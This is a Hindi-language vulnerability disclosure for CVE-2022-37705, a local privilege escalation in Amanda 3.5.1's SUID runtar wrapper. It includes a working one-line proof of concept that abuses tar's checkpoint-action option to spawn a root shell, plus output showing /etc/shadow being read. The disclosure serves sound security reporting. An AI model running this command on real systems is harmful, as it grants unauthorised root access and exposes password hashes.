
Amanda 3.5.1 दूसरा LPE।
[सुझाया गया विवरण] Amanda 3.5.1 में एक विशेषाधिकार वृद्धि दोष पाया गया जो backup उपयोक्ता को root विशेषाधिकारों तक ले जा सकता है। कमजोर घटक runtar SUID है, जो /usr/bin/tar को विशेष तर्कों के साथ चलाने के लिए केवल एक रैपर है जिन्हें हमलावर नियंत्रित कर सकता है। प्रोग्राम tar बाइनरी को दिए गए args की सही ढंग से जाँच नहीं करता (यह मानता है कि सभी args इस प्रकार होने चाहिए --ARG VALUE लेकिन हम इसे --ARG=VALUE प्रदान कर सकते हैं एक तर्क के रूप में)।
[अतिरिक्त जानकारी] इस दोष का उपयोग कोड निष्पादन (Code Execution), सेवा अस्वीकार (Denial of Service), विशेषाधिकार वृद्धि (Escalation of Privileges) और सूचना प्रकटीकरण (Information Disclosure) के लिए किया जा सकता है। यह इसे एक्सप्लॉइट करने और रूट शेल प्राप्त करने के लिए PoC है: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[भेद्यता प्रकार अन्य] दोषपूर्ण तर्क जाँच।
[उत्पाद का विक्रेता] Amanda
[प्रभावित उत्पाद कोड बेस] runtar - 3.5.1
[प्रभावित घटक] प्रभावित SUID बाइनरी है: runtar प्रभावित फ़ाइल है: runtar.c प्रभावित कोड की पंक्तियाँ पंक्ति 162 से शुरू होती हैं।
[हमले का प्रकार] स्थानीय
[प्रभाव कोड निष्पादन] true
[प्रभाव सेवा अस्वीकार] true
[प्रभाव विशेषाधिकार वृद्धि] true
[प्रभाव सूचना प्रकटीकरण] true
[हमले के वेक्टर] बाइनरी का शोषण करने के लिए आपको केवल runtar SUID बाइनरी को विशेष रूप से तैयार किए गए तर्क देने होंगे ताकि root तक विशेषाधिकार बढ़ाया जा सके।
[संदर्भ] http://www.amanda.org/
[खोजकर्ता] Maher Azzouzi
CVE-2022-37705 का उपयोग करें।